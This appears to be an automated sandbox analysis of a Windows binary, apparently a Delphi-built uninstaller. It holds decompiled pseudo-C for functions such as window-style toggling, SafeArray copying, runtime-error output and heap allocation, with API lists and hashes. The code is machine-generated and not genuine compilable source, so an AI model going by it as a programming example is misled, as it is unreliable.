                                                            							_t3 = _t29 + 0x164; // 0x0
                                                            							_push(E0040B278( *_t3));
                                                            							_t32 =  *0x6cded8; // 0x6d5c28
                                                            							_t4 = _t32 + 0x15c; // 0x0
                                                            							_t34 = E0040B278( *_t4);
                                                            							_pop(_t45);
                                                            							E006AF190(_t34, __ebx, 0x30, _t45, __edi, __esi);
                                                            						}
                                                            					}
                                                            				}
                                                            				_pop(_t42);
                                                            				 *[fs:eax] = _t42;
                                                            				_push(E006B8200);
                                                            				E0040A1C8(_t48 - 0x48);
                                                            				E0040A228(_t48 - 0x3c, 5);
                                                            				_t44 =  *0x4012b8; // 0x4012bc
                                                            				E0040C024(_t48 - 0x20, 7, _t44);
                                                            				return E0040A1EC(_t48 - 4);
                                                            			}














                                                            APIs
                                                              • Part of subcall function 0060F6D8: GetCurrentProcess.KERNEL32(00000028), ref: 0060F6E8
                                                              • Part of subcall function 0060F6D8: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0060F6EE
                                                            • SetForegroundWindow.USER32(?), ref: 006B817A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Process$CurrentForegroundOpenTokenWindow
                                                            • String ID: %hm$(\m$Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.$bm
                                                            • API String ID: 3179053593-36556386
                                                            • Opcode ID: b7594902ceb65011b7cd408ddb31800c32ac1c1d22a90f0235b323c67c5cc1dc
                                                            • Instruction ID: d1bb377931262cf507ba46983c8bd46f5a1d5c2f393bef5d4bb5aec732555b7a
                                                            • Opcode Fuzzy Hash: b7594902ceb65011b7cd408ddb31800c32ac1c1d22a90f0235b323c67c5cc1dc
                                                            • Instruction Fuzzy Hash: 621130746042049FD700EB69DD86FE837EAAB49304F5540BAF401AB7A2CE79AC82C759
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 43%
                                                            			E00409E60(void* __ecx) {
                                                            				long _v4;
                                                            				void* _t3;
                                                            				void* _t9;
                                                            
                                                            				if( *0x6cf05c == 0) {
                                                            					if( *0x6c5036 == 0) {
                                                            						_push(0);
                                                            						_push("Error");
                                                            						_push("Runtime error     at 00000000");
                                                            						_push(0);
                                                            						L0040529C();
                                                            					}
                                                            					return _t3;
                                                            				} else {
                                                            					if( *0x6cf348 == 0xd7b2 &&  *0x6cf350 > 0) {
                                                            						 *0x6cf360();
                                                            					}
                                                            					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1d,  &_v4, 0);
                                                            					_t9 = E0040AC70(0x409ef4);
                                                            					return WriteFile(GetStdHandle(0xfffffff5), _t9, 2,  &_v4, 0);
                                                            				}
                                                            			}







                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
                                                            • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
                                                            • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: FileHandleWrite
                                                            • String ID: Error$Runtime error at 00000000
                                                            • API String ID: 3320372497-2970929446
                                                            • Opcode ID: a4deac2aa97ac97823855fef04cac89a22f23a0563f87e50a6800a30aeefe081
                                                            • Instruction ID: a01582976990e38fcf300ac2ca1e4f1bd102d55210953f65d1fcb3aa769fb624
                                                            • Opcode Fuzzy Hash: a4deac2aa97ac97823855fef04cac89a22f23a0563f87e50a6800a30aeefe081
                                                            • Instruction Fuzzy Hash: 52F04FA0A44780BAEB10B7A19C07F7B261AD741B28F10567FB214B91D3C6B85CC49AE9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 77%
                                                            			E0043171C(short* __eax, intOrPtr __ecx, signed short* __edx) {
                                                            				char _v260;
                                                            				char _v768;
                                                            				char _v772;
                                                            				short* _v776;
                                                            				intOrPtr _v780;
                                                            				char _v784;
                                                            				signed int _v788;
                                                            				signed short* _v792;
                                                            				char _v796;
                                                            				char _v800;
                                                            				intOrPtr* _v804;
                                                            				signed short* _v808;
                                                            				void* __ebp;
                                                            				signed char _t55;
                                                            				signed int _t64;
                                                            				void* _t72;
                                                            				intOrPtr* _t83;
                                                            				void* _t103;
                                                            				void* _t105;
                                                            				void* _t108;
                                                            				void* _t109;
                                                            				intOrPtr* _t118;
                                                            				void* _t122;
                                                            				intOrPtr _t123;
                                                            				char* _t124;
                                                            				void* _t125;
                                                            
                                                            				_t110 = __ecx;
                                                            				_v780 = __ecx;
                                                            				_v808 = __edx;
                                                            				_v776 = __eax;
                                                            				if((_v808[0] & 0x00000020) == 0) {
                                                            					L00430EC8(0x80070057);
                                                            				}
                                                            				_t55 =  *_v808 & 0x0000ffff;
                                                            				if((_t55 & 0x00000fff) != 0xc) {
                                                            					_push(_v808);
                                                            					_push(_v776);
                                                            					L0042F04C();
                                                            					return L00430EC8(_v776);
                                                            				} else {
                                                            					if((_t55 & 0x00000040) == 0) {
                                                            						_v792 = _v808[4];
                                                            					} else {
                                                            						_v792 =  *(_v808[4]);
                                                            					}
                                                            					_v788 =  *_v792 & 0x0000ffff;
                                                            					_t103 = _v788 - 1;
                                                            					if(_t103 < 0) {
                                                            						L9:
                                                            						_push( &_v772);
                                                            						_t64 = _v788;
                                                            						_push(_t64);
                                                            						_push(0xc);
                                                            						L0042F628();
                                                            						_t123 = _t64;
                                                            						if(_t123 == 0) {
                                                            							E00430C20(_t110);
                                                            						}
                                                            						L00431164(_v776);
                                                            						 *_v776 = 0x200c;
                                                            						 *((intOrPtr*)(_v776 + 8)) = _t123;
                                                            						_t105 = _v788 - 1;
                                                            						if(_t105 < 0) {
                                                            							L14:
                                                            							_t107 = _v788 - 1;
                                                            							if(E00431694(_v788 - 1, _t125) != 0) {
                                                            								L0042F650();
                                                            								L00430EC8(_v792);
                                                            								L0042F650();
                                                            								L00430EC8( &_v260);
                                                            								_v780(_t123,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
                                                            							}
                                                            							_t72 = E004316C4(_t107, _t125);
                                                            						} else {
                                                            							_t108 = _t105 + 1;
                                                            							_t83 =  &_v768;
                                                            							_t118 =  &_v260;
                                                            							do {
                                                            								 *_t118 =  *_t83;
                                                            								_t118 = _t118 + 4;
                                                            								_t83 = _t83 + 8;
                                                            								_t108 = _t108 - 1;
                                                            							} while (_t108 != 0);
                                                            							do {
                                                            								goto L14;
                                                            							} while (_t72 != 0);
                                                            							return _t72;
                                                            						}
                                                            					} else {
                                                            						_t109 = _t103 + 1;
                                                            						_t122 = 0;
                                                            						_t124 =  &_v772;
                                                            						do {
                                                            							_v804 = _t124;
                                                            							_push(_v804 + 4);
                                                            							_t23 = _t122 + 1; // 0x1
                                                            							_push(_v792);
                                                            							L0042F630();
                                                            							L00430EC8(_v792);
                                                            							_push( &_v784);
                                                            							_t26 = _t122 + 1; // 0x1
                                                            							_push(_v792);
                                                            							L0042F638();
                                                            							L00430EC8(_v792);
                                                            							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
                                                            							_t122 = _t122 + 1;
                                                            							_t124 = _t124 + 8;
                                                            							_t109 = _t109 - 1;
                                                            						} while (_t109 != 0);
                                                            						goto L9;
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004317D1
                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004317ED
                                                            • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00431826
                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004318A3
                                                            • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004318BC
                                                            • VariantCopy.OLEAUT32(?,?), ref: 004318F7
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                            • String ID:
                                                            • API String ID: 351091851-0
                                                            • Opcode ID: 040e7940f355aaa7652d1378d9b08393b08e43244b2170bcb39dc03bfc7fe70c
                                                            • Instruction ID: ede279f2d9249a03c5eeb803d5e3445196a0ad83b08d93498a0369a0c14e8414
                                                            • Opcode Fuzzy Hash: 040e7940f355aaa7652d1378d9b08393b08e43244b2170bcb39dc03bfc7fe70c
                                                            • Instruction Fuzzy Hash: 41512D75A002299FCB62DB59CD81BD9B3FCAF0C304F4455EAE508E7212D634AF858F58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E006AE6F8(signed int __eax) {
                                                            				intOrPtr* _t14;
                                                            				signed int _t18;
                                                            				intOrPtr* _t19;
                                                            				intOrPtr* _t23;
                                                            				signed int _t26;
                                                            				long _t27;
                                                            				intOrPtr* _t29;
                                                            				intOrPtr* _t33;
                                                            				signed int _t37;
                                                            				intOrPtr* _t38;
                                                            
                                                            				_t37 = __eax;
                                                            				 *0x6d6827 = __eax ^ 0x00000001;
                                                            				_t14 =  *0x6cdec4; // 0x6d579c
                                                            				_t18 = GetWindowLongW( *( *_t14 + 0x188), 0xffffffec) & 0xffffff00 | (_t17 & 0x00000080) == 0x00000000;
                                                            				if(_t37 != _t18) {
                                                            					_t19 =  *0x6cdec4; // 0x6d579c
                                                            					SetWindowPos( *( *_t19 + 0x188), 0, 0, 0, 0, 0, 0x97);
                                                            					_t23 =  *0x6cdec4; // 0x6d579c
                                                            					_t26 = GetWindowLongW( *( *_t23 + 0x188), 0xffffffec);
                                                            					if(_t37 == 0) {
                                                            						_t27 = _t26 | 0x00000080;
                                                            					} else {
                                                            						_t27 = _t26 & 0xffffff7f;
                                                            					}
                                                            					_t38 =  *0x6cdec4; // 0x6d579c
                                                            					SetWindowLongW( *( *_t38 + 0x188), 0xffffffec, _t27);
                                                            					if(_t37 == 0) {
                                                            						_t29 =  *0x6cdec4; // 0x6d579c
                                                            						return SetWindowPos( *( *_t29 + 0x188), 0, 0, 0, 0, 0, 0x57);
                                                            					} else {
                                                            						_t33 =  *0x6cdec4; // 0x6d579c
                                                            						return ShowWindow( *( *_t33 + 0x188), 5);
                                                            					}
                                                            				}
                                                            				return _t18;
                                                            			}

                                                            APIs
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 006AE714
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,006B78BD,00000000,006B81F9), ref: 006AE743
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 006AE758
                                                            • SetWindowLongW.USER32 ref: 006AE77F
                                                            • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 006AE798
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 006AE7B9
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Window$Long$Show
                                                            • String ID:
                                                            • API String ID: 3609083571-0
                                                            • Opcode ID: 5cdc2a2f03025ac3e3b3afbb97f1bf29b70dcad7f16aa9e547f2343e461a08eb
                                                            • Instruction ID: c5f2d3f14be40374ea6ae40072baf741f42d7864aa45c80e1917733d0618a2ec
                                                            • Opcode Fuzzy Hash: 5cdc2a2f03025ac3e3b3afbb97f1bf29b70dcad7f16aa9e547f2343e461a08eb
                                                            • Instruction Fuzzy Hash: FC111C75745200AFD700EB68DD81FE237EAAB9E314F4541A5F6158F3E2CA65EC40DB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 68%
                                                            			E00405A04(signed int __eax) {
                                                            				signed int __ebx;
                                                            				signed int __edi;
                                                            				signed int __esi;
                                                            				intOrPtr* _t99;
                                                            				signed int _t104;
                                                            				signed int _t109;
                                                            				signed int _t110;
                                                            				intOrPtr* _t114;
                                                            				void* _t116;
                                                            				intOrPtr* _t121;
                                                            				signed int _t125;
                                                            				signed int _t129;
                                                            				signed int _t131;
                                                            				signed int _t132;
                                                            				signed int _t133;
                                                            				signed int _t134;
                                                            				signed int _t135;
                                                            				unsigned int _t141;
                                                            				signed int _t142;
                                                            				void* _t144;
                                                            				intOrPtr* _t147;
                                                            				intOrPtr _t148;
                                                            				signed int _t150;
                                                            				long _t156;
                                                            				intOrPtr _t159;
                                                            				signed int _t162;
                                                            
                                                            				_t95 = __eax;
                                                            				_t129 =  *0x6cf05d; // 0x0
                                                            				if(__eax > 0xa2c) {
                                                            					__eflags = __eax - 0x40a2c;
                                                            					if(__eax > 0x40a2c) {
                                                            						_pop(_t120);
                                                            						__eflags = __eax;
                                                            						if(__eax >= 0) {
                                                            							_push(_t120);
                                                            							_t162 = __eax;
                                                            							_t2 = _t162 + 0x10010; // 0x10110
                                                            							_t156 = _t2 - 0x00000001 + 0x00000004 & 0xffff0000;
                                                            							_t121 = VirtualAlloc(0, _t156, 0x101000, 4);
                                                            							if(_t121 != 0) {
                                                            								_t147 = _t121;
                                                            								 *((intOrPtr*)(_t147 + 8)) = _t162;
                                                            								 *(_t147 + 0xc) = _t156 | 0x00000004;
                                                            								E00405764();
                                                            								_t99 =  *0x6d1b84; // 0x6d1b80
                                                            								 *_t147 = 0x6d1b80;
                                                            								 *0x6d1b84 = _t121;
                                                            								 *((intOrPtr*)(_t147 + 4)) = _t99;
                                                            								 *_t99 = _t121;
                                                            								 *0x6d1b7c = 0;
                                                            								_t121 = _t121 + 0x10;
                                                            							}
                                                            							return _t121;
                                                            						} else {
                                                            							__eflags = 0;
                                                            							return 0;
                                                            						}
                                                            					} else {
                                                            						_t67 = _t95 + 0xd3; // 0x1d3
                                                            						_t125 = (_t67 & 0xffffff00) + 0x30;
                                                            						__eflags = _t129;
                                                            						if(__eflags != 0) {
                                                            							while(1) {
                                                            								asm("lock cmpxchg [0x6cfaec], ah");
                                                            								if(__eflags == 0) {
                                                            									goto L42;
                                                            								}
                                                            								asm("pause");
                                                            								__eflags =  *0x6cf98d;
                                                            								if(__eflags != 0) {
                                                            									continue;
                                                            								} else {
                                                            									Sleep(0);
                                                            									asm("lock cmpxchg [0x6cfaec], ah");
                                                            									if(__eflags != 0) {
                                                            										Sleep(0xa);
                                                            										continue;
                                                            									}
                                                            								}
                                                            								goto L42;
                                                            							}
                                                            						}
                                                            						L42:
                                                            						_t68 = _t125 - 0xb30; // -2445
                                                            						_t141 = _t68;
                                                            						_t142 = _t141 >> 0xd;
                                                            						_t131 = _t141 >> 8;
                                                            						_t104 = 0xffffffff << _t131 &  *(0x6cfafc + _t142 * 4);
                                                            						__eflags = 0xffffffff;
                                                            						if(0xffffffff == 0) {
                                                            							_t132 = _t142;
                                                            							__eflags = 0xfffffffe << _t132 &  *0x6cfaf8;
                                                            							if((0xfffffffe << _t132 &  *0x6cfaf8) == 0) {
                                                            								_t133 =  *0x6cfaf4; // 0x0
                                                            								_t134 = _t133 - _t125;
                                                            								__eflags = _t134;
                                                            								if(_t134 < 0) {
                                                            									_t109 = E004056E8(_t125);
                                                            								} else {
                                                            									_t110 =  *0x6cfaf0; // 0x36b3970
                                                            									_t109 = _t110 - _t125;
                                                            									 *0x6cfaf0 = _t109;
                                                            									 *0x6cfaf4 = _t134;
                                                            									 *(_t109 - 4) = _t125 | 0x00000002;
                                                            								}
                                                            								 *0x6cfaec = 0;
                                                            								return _t109;
                                                            							} else {
                                                            								asm("bsf edx, eax");
                                                            								asm("bsf ecx, eax");
                                                            								_t135 = _t132 | _t142 << 0x00000005;
                                                            								goto L50;
                                                            							}
                                                            						} else {
                                                            							asm("bsf eax, eax");
                                                            							_t135 = _t131 & 0xffffffe0 | _t104;
                                                            							L50:
                                                            							_push(_t152);
                                                            							_push(_t145);
                                                            							_t148 = 0x6cfb7c + _t135 * 8;
                                                            							_t159 =  *((intOrPtr*)(_t148 + 4));
                                                            							_t114 =  *((intOrPtr*)(_t159 + 4));
                                                            							 *((intOrPtr*)(_t148 + 4)) = _t114;
                                                            							 *_t114 = _t148;
                                                            							__eflags = _t148 - _t114;
                                                            							if(_t148 == _t114) {
                                                            								asm("rol eax, cl");
                                                            								_t80 = 0x6cfafc + _t142 * 4;
                                                            								 *_t80 =  *(0x6cfafc + _t142 * 4) & 0xfffffffe;
                                                            								__eflags =  *_t80;
                                                            								if( *_t80 == 0) {
                                                            									asm("btr [0x6cfaf8], edx");
                                                            								}
                                                            							}
                                                            							_t150 = 0xfffffff0 &  *(_t159 - 4);
                                                            							_t144 = 0xfffffff0 - _t125;
                                                            							__eflags = 0xfffffff0;
                                                            							if(0xfffffff0 == 0) {
                                                            								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]);
                                                            								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7;
                                                            								__eflags =  *_t89;
                                                            							} else {
                                                            								_t116 = _t125 + _t159;
                                                            								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3;
                                                            								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0;
                                                            								__eflags = 0xfffffff0 - 0xb30;
                                                            								if(0xfffffff0 >= 0xb30) {
                                                            									E0040561C(_t116, 0xfffffffffffffff3, _t144);
                                                            								}
                                                            							}
                                                            							_t93 = _t125 + 2; // 0x1a5
                                                            							 *(_t159 - 4) = _t93;
                                                            							 *0x6cfaec = 0;
                                                            							return _t159;
                                                            						}
                                                            					}
                                                            				} else {
                                                            					__eflags = __cl;
                                                            					_t6 = __edx + 0x6cf994; // 0xc8c8c8c8
                                                            					__eax =  *_t6 & 0x000000ff;
                                                            					__ebx = 0x6c5084 + ( *_t6 & 0x000000ff) * 8;
                                                            					if(__eflags != 0) {
                                                            						while(1) {
                                                            							__eax = 0x100;
                                                            							asm("lock cmpxchg [ebx], ah");
                                                            							if(__eflags == 0) {
                                                            								goto L5;
                                                            							}
                                                            							__ebx = __ebx + 0x20;
                                                            							__eflags = __ebx;
                                                            							__eax = 0x100;
                                                            							asm("lock cmpxchg [ebx], ah");
                                                            							if(__ebx != 0) {
                                                            								__ebx = __ebx + 0x20;
                                                            								__eflags = __ebx;
                                                            								__eax = 0x100;
                                                            								asm("lock cmpxchg [ebx], ah");
                                                            								if(__ebx != 0) {
                                                            									__ebx = __ebx - 0x40;
                                                            									asm("pause");
                                                            									__eflags =  *0x6cf98d;
                                                            									if(__eflags != 0) {
                                                            										continue;
                                                            									} else {
                                                            										Sleep(0);
                                                            										__eax = 0x100;
                                                            										asm("lock cmpxchg [ebx], ah");
                                                            										if(__eflags != 0) {
                                                            											Sleep(0xa);
                                                            											continue;
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            							goto L5;
                                                            						}
                                                            					}
                                                            					L5:
                                                            					__edx =  *(__ebx + 8);
                                                            					__eax =  *(__edx + 0x10);
                                                            					__ecx = 0xfffffff8;
                                                            					__eflags = __edx - __ebx;
                                                            					if(__edx == __ebx) {
                                                            						__edx =  *(__ebx + 0x18);
                                                            						__ecx =  *(__ebx + 2) & 0x0000ffff;
                                                            						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
                                                            						__eflags = __eax -  *(__ebx + 0x14);
                                                            						if(__eax >  *(__ebx + 0x14)) {
                                                            							_push(__esi);
                                                            							_push(__edi);
                                                            							__eflags =  *0x6cf05d;
                                                            							if(__eflags != 0) {
                                                            								while(1) {
                                                            									__eax = 0x100;
                                                            									asm("lock cmpxchg [0x6cfaec], ah");
                                                            									if(__eflags == 0) {
                                                            										goto L22;
                                                            									}
                                                            									asm("pause");
                                                            									__eflags =  *0x6cf98d;
                                                            									if(__eflags != 0) {
                                                            										continue;
                                                            									} else {
                                                            										Sleep(0);
                                                            										__eax = 0x100;
                                                            										asm("lock cmpxchg [0x6cfaec], ah");
                                                            										if(__eflags != 0) {
                                                            											Sleep(0xa);
                                                            											continue;
                                                            										}
                                                            									}
                                                            									goto L22;
                                                            								}
                                                            							}
                                                            							L22:
                                                            							 *(__ebx + 1) =  *(__ebx + 1) &  *0x6cfaf8;
                                                            							__eflags =  *(__ebx + 1) &  *0x6cfaf8;
                                                            							if(( *(__ebx + 1) &  *0x6cfaf8) == 0) {
                                                            								__ecx =  *(__ebx + 4) & 0x0000ffff;
                                                            								__edi =  *0x6cfaf4; // 0x0
                                                            								__eflags = __edi - ( *(__ebx + 4) & 0x0000ffff);
                                                            								if(__edi < ( *(__ebx + 4) & 0x0000ffff)) {
                                                            									__eax =  *(__ebx + 6) & 0x0000ffff;
                                                            									__edi = __eax;
                                                            									__eax = E004056E8(__eax);
                                                            									__esi = __eax;
                                                            									__eflags = __eax;
                                                            									if(__eax != 0) {
                                                            										goto L35;
                                                            									} else {
                                                            										 *0x6cfaec = __al;
                                                            										 *__ebx = __al;
                                                            										_pop(__edi);
                                                            										_pop(__esi);
                                                            										_pop(__ebx);
                                                            										return __eax;
                                                            									}
                                                            								} else {
                                                            									__esi =  *0x6cfaf0; // 0x36b3970
                                                            									__ecx =  *(__ebx + 6) & 0x0000ffff;
                                                            									__edx = __ecx + 0xb30;
                                                            									__eflags = __edi - __ecx + 0xb30;
                                                            									if(__edi >= __ecx + 0xb30) {
                                                            										__edi = __ecx;
                                                            									}
                                                            									__esi = __esi - __edi;
                                                            									 *0x6cfaf4 =  *0x6cfaf4 - __edi;
                                                            									 *0x6cfaf0 = __esi;
                                                            									goto L35;
                                                            								}
                                                            							} else {
                                                            								asm("bsf eax, esi");
                                                            								__esi = __eax * 8;
                                                            								__ecx =  *(0x6cfafc + __eax * 4);
                                                            								asm("bsf ecx, ecx");
                                                            								__ecx =  *(0x6cfafc + __eax * 4) + __eax * 8 * 4;
                                                            								__edi = 0x6cfb7c + ( *(0x6cfafc + __eax * 4) + __eax * 8 * 4) * 8;
                                                            								__esi =  *(__edi + 4);
                                                            								__edx =  *(__esi + 4);
                                                            								 *(__edi + 4) = __edx;
                                                            								 *__edx = __edi;
                                                            								__eflags = __edi - __edx;
                                                            								if(__edi == __edx) {
                                                            									__edx = 0xfffffffe;
                                                            									asm("rol edx, cl");
                                                            									_t38 = 0x6cfafc + __eax * 4;
                                                            									 *_t38 =  *(0x6cfafc + __eax * 4) & 0xfffffffe;
                                                            									__eflags =  *_t38;
                                                            									if( *_t38 == 0) {
                                                            										asm("btr [0x6cfaf8], eax");
                                                            									}
                                                            								}
                                                            								__edi = 0xfffffff0;
                                                            								__edi = 0xfffffff0 &  *(__esi - 4);
                                                            								__eflags = 0xfffffff0 - 0x10a60;
                                                            								if(0xfffffff0 < 0x10a60) {
                                                            									_t52 =  &((__esi - 4)[0xfffffffffffffffc]);
                                                            									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7;
                                                            									__eflags =  *_t52;
                                                            								} else {
                                                            									__edx = __edi;
                                                            									__edi =  *(__ebx + 6) & 0x0000ffff;
                                                            									__edx = __edx - __edi;
                                                            									__eax = __edi + __esi;
                                                            									__ecx = __edx + 3;
                                                            									 *(__eax - 4) = __ecx;
                                                            									 *(__edx + __eax - 8) = __edx;
                                                            									__eax = E0040561C(__eax, __ecx, __edx);
                                                            								}
                                                            								L35:
                                                            								_t56 = __edi + 6; // 0x6
                                                            								__ecx = _t56;
                                                            								 *(__esi - 4) = _t56;
                                                            								__eax = 0;
                                                            								 *0x6cfaec = __al;
                                                            								 *__esi = __ebx;
                                                            								 *((intOrPtr*)(__esi + 0x10)) = 0;
                                                            								 *((intOrPtr*)(__esi + 0x14)) = 1;
                                                            								 *(__ebx + 0x18) = __esi;
                                                            								_t61 = __esi + 0x20; // 0x36b3990
                                                            								__eax = _t61;
                                                            								__ecx =  *(__ebx + 2) & 0x0000ffff;
                                                            								__edx = __ecx + __eax;
                                                            								 *(__ebx + 0x10) = __ecx + __eax;
                                                            								__edi = __edi + __esi;
                                                            								__edi = __edi - __ecx;
                                                            								__eflags = __edi;
                                                            								 *(__ebx + 0x14) = __edi;
                                                            								 *__ebx = 0;
                                                            								 *(__eax - 4) = __esi;
                                                            								_pop(__edi);
                                                            								_pop(__esi);
                                                            								_pop(__ebx);
                                                            								return __eax;
                                                            							}
                                                            						} else {
                                                            							_t19 = __edx + 0x14;
                                                            							 *_t19 =  *(__edx + 0x14) + 1;
                                                            							__eflags =  *_t19;
                                                            							 *(__ebx + 0x10) = __ecx;
                                                            							 *__ebx = 0;
                                                            							 *(__eax - 4) = __edx;
                                                            							_pop(__ebx);
                                                            							return __eax;
                                                            						}
                                                            					} else {
                                                            						 *(__edx + 0x14) =  *(__edx + 0x14) + 1;
                                                            						__ecx = 0xfffffff8 &  *(__eax - 4);
                                                            						__eflags = 0xfffffff8;
                                                            						 *(__edx + 0x10) = 0xfffffff8 &  *(__eax - 4);
                                                            						 *(__eax - 4) = __edx;
                                                            						if(0xfffffff8 == 0) {
                                                            							__ecx =  *(__edx + 8);
                                                            							 *(__ecx + 0xc) = __ebx;
                                                            							 *(__ebx + 8) = __ecx;
                                                            							 *__ebx = 0;
                                                            							_pop(__ebx);
                                                            							return __eax;
                                                            						} else {
                                                            							 *__ebx = 0;
                                                            							_pop(__ebx);
                                                            							return __eax;
                                                            						}
                                                            					}
                                                            				}
                                                            			}

                                                            0x00405d2e
                                                            0x00405d30
                                                            0x00405d30
                                                            0x00405d2e
                                                            0x00405d3c
                                                            0x00405d41
                                                            0x00405d41
                                                            0x00405d43
                                                            0x00405d64
                                                            0x00405d64
                                                            0x00405d64
                                                            0x00405d45
                                                            0x00405d45
                                                            0x00405d4b
                                                            0x00405d4e
                                                            0x00405d52
                                                            0x00405d58
                                                            0x00405d5a
                                                            0x00405d5a
                                                            0x00405d58
                                                            0x00405d69
                                                            0x00405d6c
                                                            0x00405d6f
                                                            0x00405d7b
                                                            0x00405d7b
                                                            0x00405c9e
                                                            0x00405a1c
                                                            0x00405a1c
                                                            0x00405a1e
                                                            0x00405a1e
                                                            0x00405a25
                                                            0x00405a2c
                                                            0x00405a84
                                                            0x00405a84
                                                            0x00405a89
                                                            0x00405a8d
                                                            0x00000000
                                                            0x00000000
                                                            0x00405a8f
                                                            0x00405a8f
                                                            0x00405a92
                                                            0x00405a97
                                                            0x00405a9b
                                                            0x00405a9d
                                                            0x00405a9d
                                                            0x00405aa0
                                                            0x00405aa5
                                                            0x00405aa9
                                                            0x00405aab
                                                            0x00405aae
                                                            0x00405ab0
                                                            0x00405ab7
                                                            0x00000000
                                                            0x00405ab9
                                                            0x00405abb
                                                            0x00405ac0
                                                            0x00405ac5
                                                            0x00405ac9
                                                            0x00405ad1
                                                            0x00000000
                                                            0x00405ad1
                                                            0x00405ac9
                                                            0x00405ab7
                                                            0x00405aa9
                                                            0x00000000
                                                            0x00405a9b
                                                            0x00405a84
                                                            0x00405a2e
                                                            0x00405a2e
                                                            0x00405a31
                                                            0x00405a34
                                                            0x00405a39
                                                            0x00405a3b
                                                            0x00405a54
                                                            0x00405a57
                                                            0x00405a5b
                                                            0x00405a5d
                                                            0x00405a60
                                                            0x00405ad8
                                                            0x00405ad9
                                                            0x00405ada
                                                            0x00405ae1
